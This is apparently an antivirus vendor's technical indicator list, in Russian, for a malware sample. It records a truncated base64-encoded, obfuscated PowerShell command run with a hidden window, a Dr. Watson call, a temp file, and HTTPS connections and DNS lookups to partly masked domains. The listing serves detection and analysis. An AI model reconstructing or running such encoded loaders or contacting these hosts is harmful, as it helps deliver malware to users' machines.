Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABHAGEANAAwAGYAbQA2AD0AWwBjAGgAYQByAF0ANAAyADsAJABUAGUAdABqADIAagB3AD0AKAAnAEgAJwArACcAegAnACsAKAAnAHgANgA3AGsAJwArACcAMwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %TEMP%\728665.cvr
- 'cu##el.com':443
- 'cu##el.com':443
- DNS ASK vi###ohomem.com
- DNS ASK at##tx.com
- DNS ASK we###chieu.com
- DNS ASK cu##el.com
- DNS ASK an###g1102.vn
- DNS ASK we###nx.com.pk
- DNS ASK ma###.#eb.unib.ac.id
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABHAGEANAAwAGYAbQA2AD0AWwBjAGgAYQByAF0ANAAyADsAJABUAGUAdABqADIAagB3AD0AKAAnAEgAJwArACcAegAnACsAKAAnAHgANgA3AGsAJwArACcAMwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQ... (со скрытым окном)